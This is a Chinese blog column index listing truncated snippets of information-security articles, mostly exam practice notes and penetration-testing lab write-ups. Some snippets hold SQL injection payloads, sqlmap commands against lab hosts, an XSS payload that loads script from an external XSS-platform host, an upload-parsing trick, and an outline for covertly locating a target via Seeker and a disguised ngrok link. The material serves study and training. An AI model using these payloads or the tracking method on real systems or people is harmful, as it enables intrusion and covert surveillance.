首页
AI Coding
NEW
沸点
课程
直播
活动
AI刷题
APP
插件
搜索历史
清空
创作者中心
写文章
发沸点
写笔记
写代码
草稿箱
创作灵感
查看更多
会员
登录
注册
信息安全
sparename
创建于2022-10-08
订阅专栏
信息安全网络安全相关内容
暂无订阅
共45篇文章
创建于2022-10-08
订阅专栏
默认顺序
默认顺序
最早发布
最新发布
应用安全
常用浏览器的安全措施。(1)删除和管理 Cookie 1、Cookie是由服务器端生成,发送给User-Agent(一般是浏览器)的小量信息; 2、浏览器会将 Cookie的 key/value保存到某个目录下的文本文件内,下次请求同一网站时就发送该 Cookie给服务器,这样服...
尤里的复仇II 回归
Tips: 经过上次的事件,尤里深刻了解到信息收集的重要性,这次他决定利用信息收集轻松搞定个站点…… 这个cms好像有个sql注入漏洞,找到它,拿到数据库里的flag吧! 传送门 开始拿到这题,先做了指纹识别,识别不出来就F12查看器查到了seacms 去网上查了poc,发现后台...
网络精英赛模拟练习(6)
1、 数据安全本质上是一种静态的安全,而行为安全是一种动态安全。(单选题,1分) A. B. C. D. 回答正确(得分: 1分) 正确答案 D 解析 暂无解析 2、 信息内容安全是信息安全在政治、法律、道德层次上的要求。(单选题,1分) A. B. C. D. (单选题,1分)...
操作系统安全与系统攻击
3.1 操作系统安全3.3.◆操作系统安全机制 ◆了解操作系统标识与鉴别、访问控制、权限管理、信道保护、安全审计、内存存取、文件保护等安全机制 ◆操作系统安全配置 ◆了解安全补丁、最小化部署、远程访问控制、账户及口令策略、安全审计及其他操作系统配置要点。 ◆操作系统安全目标 ◆标...
Kali Linux VMware虚拟机开启SSH
首先进入Kali Linux图形界面,打开终端。当然也可以按Ctrl+Alt+F2直接进入命令行界面,不通过图形界面。 输入命令vi /etc/ssh/sshd_config 找到 PasswordAuthentication 这一行,按"i"进入输入模式,去掉PasswordA...
软件安全开发
◆软件生命周期模型 ◆了解软件生命周期的概念及瀑布模型、迭代模型、增量模型、快速原型模型、螺旋模型、净室模型等典型 ◆软件开发生命周期模型。 ◆软件危机与安全问题 ◆了解三次软件危机产生的原因、特点和解决方案 ◆了解软件安全和软件安全保障的基本概念。 ◆软件安全生命周期模型 ◆了...
网络精英赛模拟练习(8)
(单选题,1分) A. B. C. D. (单选题,1分) A. B. C. D. 回答正确(得分: 1分) 正确答案 D 解析 暂无解析 3、 信息隐藏是把机密信息隐藏在大量信息中不让对手察觉的一种技术。A. B. C. D. 回答正确(得分: 1分) 正确答案 A 解析 暂无...
封神台——训练营0基础学渗透测试
1.首先必须找出正确的密码登入usename=admin password=123456 bp抓包修改user-agent头 2.' or updatexml(1,concat(0x7e,(select table_name from information_schema.' o...
信息安全管理
信息安全管理( Information Security Management ISM) ◆ISM是管理者为实现信息安全目标(如信息资产的CIA等特性、业务运行的持续性)而进行计划、组织指挥、协调和控制的一系列活动。 ◆ISM管理对象是组织的信息及相关资产,包括信息人员、软件等,...
网络精英赛模拟练习(1)
1、 通信保密阶段所面临的主要安全威胁是搭线窃听和密码分析,其主要保护措施是数据加密。由于当时计算机速度和性能比较落后,使用范围有限,因此通信保密阶段重点是通过密码技术保证数据的机密性和完整性,解决通信保密问题。A. B. C. D. 回答正确(得分: 1分) 正确答案 A 解析...
应用与数据安全
4.1 应用安全4.4.◆Web应用安全 ◆了解WEB体系架构; ◆理解HTTP协议工作机制及明文传输数据、弱验证、无 ◆状态等安全问题; ◆理解SQL注入攻击的原理及危害; ◆了解跨站脚本安全问题的原理及危害及其他针对WEB的攻击方式; ◆了解WEB防火墙、网页防篡改等常见We...
封神台——训练营0基础学渗透测试
1. 2. 3. 4. 5.查询表名:and 1=2 union select 1,table_name,3 from information_schema.6.查询列名:and 1=2 union select 1,column_name,3 from information_...
尤里的复仇Ⅰ 小芳!
<script>alert(document.https://xsshs.cn/xss.</tExtArEa>'"><sCRiPt sRC=//xsshs.存在IIS解析漏洞:改666.png为666.http://59.63.200.79:8005/UploadFiles/20...
尤里的复仇II 回归
https://gitee.https://downloads.joomla.下载到最新版本4.0.2 在这里可以使用VScode打开文件,可以全局检索文件内容 这里使用everything高级搜索 然后一个一个访问 http://awd19-b22.aqlab.cn/langu...
身份鉴别
◆理解标识与鉴别的区别、鉴别类型、鉴别方式等 ◆基本概念 ◆了解对身份鉴别系统的主要要求 身份鉴别的概念 ◆标识 ◆实体身份的一种计算机表达 ◆每个实体与计算机内部的一个身份表达绑定 ◆信息系统在执行操作时,首先要求用户标识自己的身份,并提供证明自己身份的依据,不同的系统使用不同...
网络精英赛模拟练习(5)
A. B. C. D. A. B. C. D. (单选题,1分) A. B. C. D. A. B. C. D. (单选题,1分) A. B. C. D. (单选题,1分) A. B. C. D. (单选题,1分) A. B. C. D. (单选题,1分) A. B. C. D....
封神台——训练营0基础学渗透测试
1.判断数据库长度:and length(database())>4 12 2 .数据库名称:and substr(database(),1,1)='k ’ ascii(substr(database() ),1,1))>107 用burp进行爆破:开服务器,用本机的私网,注意变...
尤里的复仇II 回归
sqlmap -u "http://oovw8022.ia.aqlab.sqlmap -u "http://oovw8022.ia.aqlab.sqlmap -u "http://oovw8022.ia.aqlab.sqlmap -u "http://oovw8022.ia.aq...
定位目标地理位置
一、GPS简介及分布二、定位工具:Seeker三、反向代理:Ngrok四、实战:获取目标地理位置1.运行 seeker2.上传 ngrok3.短链接伪装4.物理位置定位:根据P的定位不准确,容易被欺骗,网上有很多IP伪造技术,所以定位肯定也不准确。 GPS全球定位系统:(使用最广...
下一页